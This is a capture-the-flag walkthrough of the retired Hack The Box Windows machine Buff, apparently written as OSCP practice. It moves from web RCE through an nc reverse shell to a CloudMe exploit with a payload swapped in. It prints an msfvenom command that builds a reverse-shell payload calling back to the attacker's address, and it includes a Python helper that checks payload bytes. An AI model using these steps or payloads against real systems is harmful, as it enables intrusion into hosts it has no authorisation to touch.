OSCP PREPARATIONS – HTB Buff

Buff is a retired Hack The Box machine running Windows. The goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to get to know the target machine.
Classic Scan

Full Port Scan

The port scan shows two open ports: 7680/tcp (pando-pub) and 8080/tcp (http, Apache 2.4.43).
We start enumeration on port 8080.

The page source gives nothing useful, but from its general appearance it is clearly a fitness website.
We scan for hidden files and directories with gobuster.

The scan did not find anything.
We continue enumerating through the web interface.

The site is built with Gym Management Software 1.0; let's search for known vulnerabilities in it.

There is an RCE vulnerability for it. Let's copy the exploit to our local machine and look at it.

Nothing in the code needs changing, so let's run it.

It gave us a shell as the user buff\shaun, but it is not a stable shell: we cannot change directories, etc.
Let's get nc onto the target and try to obtain a stable shell.
When we served our SMB share without a password, the target did not accept it, so we cannot use it from PowerShell.

Therefore we create the SMB share with a username and password.

We copied nc successfully.
Now it's time to run nc and get a reverse shell.

We have our shell and the user flag, but we cannot access the Administrator folder, so we continue with local enumeration.

Download winPEAS.exe

From the output we see that CloudMe_1112.exe is running on the machine.
(CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software).
Let's check whether there is a known vulnerability for it.

There are exploits matching the version in the CloudMe executable's name, but they are written in Python, and Python is not installed on Windows by default, so instead of running them on the target we will use port forwarding.
We transfer chisel to the target machine.

Let's set up the port forward with chisel.

With the port forward in place, it is time to list the exploits for CloudMe.

Here we’ll download the PoC exploit and edit it.

As you can see, the PoC only opens the calculator; we want more, namely a reverse shell.
We generate the payload with msfvenom:
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4700 -b '\x00\x0A\x0D' -f python -v payload
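As an added check that is not part of the original writeup: the -b option tells msfvenom's encoder to avoid the listed bytes, and the Python below (helper names are my own, and the sample output is constructed rather than a real payload) parses the "-f python -v payload" format back into raw bytes and reports any excluded byte that slipped through, so a failed encode is noticed before the exploit is edited.

```python
import re

# Constructed sample in the shape msfvenom prints for "-f python -v payload".
# The bytes are invented for this demo; they are not a real shellcode.
SAMPLE_OUTPUT = (
    'payload =  b""\n'
    'payload += b"\\xfc\\xe8\\x82\\x00\\x60\\x89\\xe5\\x31"\n'
    'payload += b"\\xc0\\x64\\x8b\\x50\\x30\\x8b\\x52\\x0d"\n'
)

BAD_CHARS = b"\x00\x0a\x0d"  # the set excluded with -b in the writeup

# One msfvenom line: <var> = b"" or <var> += b"\xNN\xNN..."
LINE_RE = re.compile(r'^(\w+)\s*\+?=\s*b"((?:\\x[0-9a-fA-F]{2})*)"\s*$')


def parse_msfvenom_python(text: str, var: str = "payload") -> bytes:
    """Rebuild the raw payload bytes from msfvenom's python-format output."""
    out = bytearray()
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or m.group(1) != var:
            continue  # skip unrelated lines and other variable names
        hexpairs = m.group(2).replace("\\x", "")
        out += bytes.fromhex(hexpairs)
    return bytes(out)


def find_bad_chars(payload: bytes, badchars: bytes = BAD_CHARS) -> list:
    """Return (offset, byte) for every byte of payload that is in badchars."""
    return [(i, b) for i, b in enumerate(payload) if b in badchars]


def check_payload(text: str, badchars: bytes = BAD_CHARS) -> dict:
    """Parse msfvenom output and report length and any excluded bytes."""
    payload = parse_msfvenom_python(text)
    hits = find_bad_chars(payload, badchars)
    return {"length": len(payload), "bad": hits, "clean": not hits}


if __name__ == "__main__":
    # The constructed sample deliberately contains \x00 and \x0d.
    print(check_payload(SAMPLE_OUTPUT))
```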

We update the existing exploit with the payload we generated.
I add the payload and start a listener for the shell.

We got a shell as the Administrator user.
This is how we obtained the root flag.